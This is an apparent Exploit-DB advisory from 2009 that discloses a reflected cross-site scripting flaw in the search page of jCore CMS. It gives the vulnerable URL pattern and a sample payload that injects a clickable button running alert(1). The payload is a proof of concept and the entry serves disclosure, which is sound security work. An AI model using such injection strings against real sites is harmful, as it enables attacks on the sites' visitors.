jCore CMS Cross-Site Scripting Vulnerability

2009-12-17T00:00:00
ID EDB-ID:10531
Type exploitdb
Reporter loneferret
Modified 2009-12-17T00:00:00

Description

jCore CMS Cross Site Scripting Vulnerability. Webapps exploit for php platform

                                        
                                            Found: loneferret
Vendor: jCore
Site: http://www.jcore.net/home
Software link: http://www.jcore.net/downloads

Search page is vulnerable to cross-site scripting.

Exploit:
http://server/modules/search?search=[xss here]
http://server/modules/search?search=</a>[xss here]

Example:
The result page will screw up. Hit the back button and you newly created
submit input type will be there. Fully functional.
http://server/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">